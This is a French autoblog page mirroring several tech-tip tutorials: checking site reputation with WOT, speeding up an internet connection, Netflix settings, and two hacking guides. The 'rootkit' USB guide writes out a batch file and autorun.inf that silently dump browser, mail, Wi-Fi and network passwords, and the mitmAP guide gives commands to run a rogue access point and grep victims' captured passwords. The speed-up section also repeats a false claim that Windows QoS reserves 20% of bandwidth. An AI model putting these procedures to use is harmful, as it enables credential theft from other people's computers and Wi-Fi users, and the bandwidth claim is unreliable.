PROJET AUTOBLOG


FunInformatique

Site original : FunInformatique

⇐ retour index

Vérifiez si un site est fiable avant d’y accéder

vendredi 4 décembre 2020 à 18:11

Vous ne faites plus confiance en quoi que ce soit sur internet, a cause de la multiplication explosive de centaines des sites de phishing. Vous voulez savoir si un site est potentiellement dangereux ou non ? Comment déterminer la crédibilité d’un site ?

Dans cet article, nous allons voir comment savoir si un site est fiable et quelle est sa Web-Réputation ?

Avec WOT (Web Of Trust), vous allez pouvoir éviter les “mauvais” sites en vous alertant des sites malveillants ou à mauvaise réputations.

Web of trust ( WOT, www.mywot.com) est un outil gratuit qui détermine si un site est potentiellement dangereux ou non. Cette extension indique à l’aide de symboles les sites de confiance sur lequel vous pouvez naviguer, effectuer des recherches et acheter sans aucun risque. Grâce à une communauté d’utilisateurs très active de nombreux sites sont notés et jugés fiable, peu fiable ou dangereux.

Comment savoir si un site est fiable en utilisant WOT ?

Etape 1:

Tout d’abord, télécharger et ajouter l’extension WOT pour votre navigateur Chrome ou Firefox. Dans la page de configuration, qui s’ouvre automatiquement, cliquez sur continuer pour choisir par défaut les paramètres Basique. Sur la page suivante, créez un compte WOT en saisissant vos informations ou en cliquant sur “vous connecter avec Facebook”. Cochez la case des conditions puis appuyez sur enregistrer.

Etape 2:

La prochaine fois que vous irez sur Google pour lancer une recherche, vous verrez apparaître des icônes WOT près de chaque lien. L’icône de couleur verte indique un site est fiable, rouge dangereux et gris signifie non noté. Positionnez le curseur sur un lien pour y faire apparaître un résumé WOT, puis cliquez pour vous rendre sur sa page WOT.

vérifier-site-confiance

Etape 3:

Les pages WOT vous donne accès à la page de réputation d’un site. Faites défiliez vers le bas pour lire les commentaires d’autres utilisateurs WOT. Si vous êtes d’accord avec un commentaire, cliquez sur un des icônes associés. Pour ajouter votre propre note et commentaire, cliquez sur “Rate the website”.

C’est l’occasion pour donner une bonne note à notre page Wot FunInformatique.com et montrer que notre blog est un site de fiable et de confiance. 🙂

Etape 4:

Une fois sur la page de notation, cliquez sur les barres en couleurs pour donner une note au site web en tant que site confiance et favorable à la famille. Renseigner les catégories pour conforter votre notation. Saisissez votre commentaire dans le champ texte puis cliquer sur “Save”.

savoir-site-fiable

Pour vérifier ou noter un site déjà ouvert dans votre navigateur Chrome, Cliquez sur l’icone WOT de la barre des favoris pour ouvrir un résumé au format pop-up et cliquez sur les barres de couleurs. Cliquez sur “afficher les détails et commentaires” pour ouvrir sa page de réputation. Cliquez sur “Mon profil” pour visualiser et modifier votre profil.”

site-est-fiable

Tutoriels recommandés pour vous

Augmenter considérablement votre débit de connexion internet

vendredi 4 décembre 2020 à 18:06

Votre connexion internet est lente ? Votre connexion Internet sans fil est souvent coupée ? Vous trouvez que votre connexion internet est différente au débit « théorique » qui est marqué sur le contrat de votre fournisseur d’accès ?
Il est sans doute nécessaire d’optimiser votre connexion internet.

Dans cet article, nous allons voir deux astuces pour augmenter considérablement votre débit de connexion internet.

Avant toute chose, faites un test de débit et comparez ce résultat avec ce que vous a promis votre FAI. Il existe de très nombreux sites ou programmes qui vous permettent de tester le débit réel de votre connexion.

Voici 3 outils pour tester la vitesse de sa connexion internet et déterminer si votre connexion est bridée. Ils réalisent des testes de vitesse sur plusieurs serveurs.

Si votre débit est constamment inférieur au débit proposé, alors suivez les instructions suivantes:

Augmenter la vitesse de connexion internet avec TCP Optimizer

Il faut savoir que pour que deux ordinateurs puissent communiquer, ils utilisent un langage commun appelé TCP/IP (Transfer Control Protocol/Internet Protocol). Ce protocole découpe une information (page web, fichier rar …etc) en paquets, y ajoute une adresse de destination et assure la livraison de ces paquets à bon port (votre ordinateur).

Grâce au logiciel TCP Optimizer, il est possible d’optimiser ce processus, ce qui accélère toute activité liée à Internet. En effet, le logiciel va modifier des entrées de votre base de Registre afin d’optimiser votre protocole TCP. Cet application trouve facilement les meilleures valeurs MTU (Maximum Transmission Unit) et RWIN(TCP Receive Window), et intègre les paramètres les plus fiables, optimisant la capacité de votre bande passante ainsi que la vitesse de votre connexion internet.

Comment utiliser TCP Optimizer ?

Tout d’abord, télécharger TCP optimizer, ensuite ouvrez l’application en mode Administrateur, puis cochez “Optimal” et validez par “Apply change”. Redémarrer votre machine et le logiciel s’occupe de tout.

augmenter-vitesse-internet

Remarque:

Avec une connexion ADSL de 4Mbps. Sache que ce ne sont pas des méga-octets, mais des Mégabits, et théoriquement, comme 1 octet = 8 bits, autrement dit, il faut diviser le nombre de Mbits par 8 pour obtenir le débit théorique en Mo !
Donc, 4 Mbits/s, ça donne 512ko /s (Kilo-octets par seconde) maximum en téléchargement!
En général, vous téléchargez plutôt dans des vitesses proches de 220 Ko/s, et non les 512 officiels. Ceci est du au fait que votre PC n’utilise pas votre connexion de manière optimale, et c’est ce à quoi TCP Optimizer vous permet de remédier.

Augmenter le débit internet de 20% avec la base de registre

Généralement les paramètres de Windows ont des valeurs par défaut dans la base de registre, il est alors intéressant de modifier ces paramètres afin d’améliorer votre connexion.

20 % de la bande passante de votre réseau local est réservée par le service QoS De Windows. Et cela pour des besoins de mise à jour et de téléchargement de fonctionnalités, ce qui veut dire votre connexion internet est donc bridée à 1/5 eme de sa vitesse.

Il suffit alors d’enlever cette limite pour augmenter la vitesse de votre connexion internet. Votre débit sera alors le plus performant et le plus rapide possible.

Comment faire ?

Pour augmenter considérablement la vitesse de connexion internet sous Windows 7,8 et 10, suivez ces étapes :

vitesse-internet-windows-7

Sachez qu’il est possible d’augmenter la vitesse de sa connexion internet sur son mobile Android. Pour cela, je vous invite à voir le tutoriel suivant: augmenter la vitesse de sa connexion internet sur son smartphone Android ?

Conclusion

Ces deux  astuces vont nettement augmenter la vitesse de votre connexion internet. Cependant, il faut savoir que lorsque vous téléchargez un fichier sur le web, c’est un serveur qui vous l’envoie. La majorité de ces serveurs de téléchargement limitent leur vitesse d’envoi pour que tous les visiteurs puissent télécharger le fichier en même temps. Donc même si votre connexion internet à un très haut débit, vous pouvez vous retrouver avec une vitesse de téléchargement  lente .

Tutoriels recommandés pour vous

TUTO HACK: Création d’une clé USB rootkit

vendredi 4 décembre 2020 à 11:22

Aujourd’hui, nous allons voir comment créer une clé USB qui récupère les mots de passe d’un ordinateur. Cette clé USB s’exécute automatiquement et récupère la plupart des mots de passe stocker sur votre ordinateur. Il est vraiment très utile surtout quand on a perdu ses mots de passe.

Pour créer une clé USB rootkit, suivez les étapes ci-dessous:

Étape 1

Nous allons dans un premier temps télécharger quelque outils qui nous permettent de récupérer les mots de passe des applications les plus courantes. Toutes ces applications sont issues du site Nirsoft (http://www.nirsoft.net/).

Ensuite, nous allons placer tous les fichiers .exe  sur notre clé USB.

usb1

Étape 2

Maintenant, il faut créer un fichier launch.bat qui va ouvrir automatiquement les programmes de récupération de mot de passe et il va  stocker les résultats dans un fichier texte.
Pour cela, on doit créer un nouveau document texte avec bloc note ou autre et écrire le code ci-dessous.

@echo off
start WebBrowserPassView.exe /stext dossier1/WebBrowserPassView.txt
start mailpv.exe /stext dossier1/mailpv.txt
start WirelessKeyView.exe /stext dossier1/WirelessKeyView.txt
start netpass.exe /stext dossier1/netpass.txt

Attention a bien vérifier que les noms des outils correspondent bien aux noms qui sont écrit dans le fichier launch.bat .

Comme vous avez pu le voir dans les lignes ci dessus, lorsque launch.bat sera exécuté , ces logs seront envoyé dans un dossier appelé dossier1. Il nous faut donc créé un nouveau dossier et le nommer dossier1.

Étape 3

Maintenant nous allons créer le fichier autorun.inf. Le fichier autorun.inf est un fichier texte enregistré à la racine d’un périphérique de stockage (CD, Clé USB, etc.) permettant d’automatiser le lancement de certains programmes lors de l’insertion d’un périphérique de stockage.

Lorsque vous insérez votre clé USB généralement une fenêtre apparaît en nous demandant ce que l’on désire faire !

Dans cette fenêtre nous allons créé une nouvelle option qui nous permettra ( une fois cliquez dessus ) de récupérez les mots de passes de l’ordinateur et de les stockés dans le dossier créé dans l’étape 2 .
Pour réalisez ceci on ouvre un nouveau document texte puis on insère le code suivant :

[autorun]
open=launch.bat
ACTION='Le nom de la nouvelle option'

Enfin on enregistre notre fichier autorun.inf.
Félicitation ! Votre clé USB rootkit est maintenant près à utiliser, il ne vous reste plus qu’à la tester.

Tutoriels recommandés pour vous

Netflix: mes meilleures astuces

jeudi 3 décembre 2020 à 21:28

Avec une offre riche de plusieurs milliers de films, séries et documentaires, dont bon nombre d’exclusivités, Netflix est aujourd’hui le service de vidéo à la demande le plus populaire. Vous êtes déjà abonné ? Mes astuces vous permettront d’en profiter vraiment à fond !

Créer des profils

Se regrouper pour partager un abonnement Netflix est un bon moyen de réduire le coût du service. Dans ce cas, créez un profil pour chaque utilisateur, afin que chacun puisse retrouver l’historique de ce qu’il a visualisé, et bénéficie de suggestions adaptées. Pour cela, il suffit de cliquer sur Ajouter un profil, juste après la connexion au service.

Ou bien cliquez sur le menu, en haut à droite, et choisissez Gérer les profils.

Activer le contrôle parental

Un profil Jeunesse permet de limiter le contenu accessible aux films et séries adaptés aux enfants. Mais rien n’empêche ces derniers de basculer sur votre profil pour contourner la limitation !

La solution consiste à activer le contrôle parental. Pour cela, accédez au Compte. Puis dans la section profils et contrôle parental, sélectionnez le profil à restreindre. Dans la liste qui s’affiche, cliquez sur Verrouillage des profils.

Saisissez un code PIN et cochez la case “Demander la saisie d’un code PIN pour accéder au profil“.

Enfin cliquez sur Enregistrer pour limiter l’accès a ce profil.

Ajuster la qualité des vidéos

Netflix ajuste automatiquement la qualité de la vidéo en fonction du débit de la connexion. Mais il est possible de contrôler vous même ce paramètre. Sélectionnez d’abord le profil concerné, et, dans le menu, sélectionnez Compte, puis Paramètres de lecture ( à la section Mon profil).

Choisissez Faible pour réduire la consommation de données, Moyen, ou Élevée pour une image de meilleure qualité. Cliquez sur Enregistrer pour valider votre choix.

Nettoyer l’historique Netflix

Vous avez commencé à regarder un film, mais finalement il ne vous plait pas ? Le problème c’est que Netflix va continuer de vous le proposer dans la section Reprendre…
Solution: effacer le film de votre historique Netflix.  Pour cela, choisissez Compte dans le menu Netflix, puis dans la section profils et contrôle parentale, cliquez sur votre profil puis sur Historique.


Vous pouvez effacer un titre en cliquant sur l’icône située en bout de ligne, ou bien vider tout l’historique avec tout masquer.

Personnaliser les sous-titres

Vous pouvez régler à votre convenance l’apparence des sous-titres, si vous les trouvez difficile à lire, ou au contraire un peu trop présents à l’écran.

Pour cela, choisissez Compte dans le menu en haut à droite, puis cliquez sur Affichage des sous-titres. Là, vous pouvez changer la police de caractères ou la taille du texte, choisir un ombrage, etc. Le texte affiché en haut de la fenêtre reflète ces choix Valider avec enregistrer.

Privilégier la VO

Vous préférez regarder films et séries en version originale ? Lancez la lecture, puis cliquez sur la bulle Audio et sous-titres, en bas à droite de l’image. Sélectionnez la langue [VO] dans la section audio, et français à la section Sous-titres. Par la suite, Netflix continuera de vous proposer la VO par défaut, tant que vous n’aurez pas modifié ces choix.

Tutoriels recommandés pour vous

Créer un faux point d’accès wifi

jeudi 19 novembre 2020 à 16:23

mitmAP est un petit programme Python qui permet de créer automatiquement un faux point d’accès avec plusieurs fonctionnalités.

Dans ce tutoriel, nous allons voir comment créer un point d’accès WiFi avec un ordinateur sous Kali Linux. Vous pourrez utiliser ce hotspot pour partager votre connexion, mais le but est aussi de voir comment les pirates peuvent manipuler le trafic et récupérer des informations (mots de passe, etc.)

Un Rogue AP (Access Point) est une sorte de «honeypot», un hotspot créé de toute pièce permettant d’intercepter le trafic de cibles potentielles qui viendraient s’y connecter. L’attaquant peut alors sniffer les paquets (attaques Man-inthe-Middle) et récupérer des données intéressantes comme des cookies, des identifiants/mots de passe ou des codes de connexion FreeWiFi, SFR WiFi Public, etc.

Bien sûr récupérer des informations de la sorte est clairement interdit, mais le but de notre démonstration est de sensibiliser les utilisateurs aux risques des hotspots ouverts.

La technique consiste à faire croire à la victime qu’elle s’adresse à un tiers de confiance — banque, administration, etc. — afin de lui soutirer des renseignements personnels : mot de passe, numéro de carte de crédit, numéro ou photocopie de la carte nationale d’identité, date de naissance, etc.

EXEMPLE D’UTILISATION DE mitmAP

Installation DU SCRIPT

Pour télécharger le script d’origine, on peut le trouver ici : https://github.com/xdavidhu/mitmAP

Sinon voici la commande d’installation: git clone https://github.com/xdavidhu/mitmAP.git

LANCEMENT DU SCRIPT

Ensuite, lancez-le simplement avec python3 et il installera automatiquement toutes les dépendances manquantes.

cd mitmAP /

sudo python3 mitmAP.py

Exécution du script

Vous aurez besoin de 2 interfaces réseau – une pour agir en tant que périphérique AP et la seconde en tant que connexion WAN.

J’ai ma carte USB externe pour agir comme AP (wlan1) et ma carte sans fil intégrée (wlan0) pour agir comme connexion WAN. Utilisez la commande ‘ifconfig’ pour voir vos interfaces Internet et les modifier en conséquence.

Voila vous avez terminé ! Votre AP est prêt et fonctionne parfaitement. Tout ce que vous avez à faire maintenant est d’attendre que l’utilisateur se connecte à votre mauvais AP. Si une victime se connecte à vous, vous verrez la connexion comme indiqué ci-dessous.

 IDENTIFIANTS CAPTURÉS !

Nous avons récupéré l’e-mail et le mot de passe ! Lorsque vous souhaitez terminer le processus, appuyez simplement sur « Ctrl + C » 2 fois. Les données que vous avez reniflées seront stockées dans le dossier « / mitmAP / logs ». Si la victime a tapé un mot de passe, vous pouvez taper cette commande pour voir si vous avez de la chance (ce n’est pas toujours la même commande).

grep -a (nom du site) mitmap-sslstrip.log | grep passwd –color = always

Tutoriels recommandés pour vous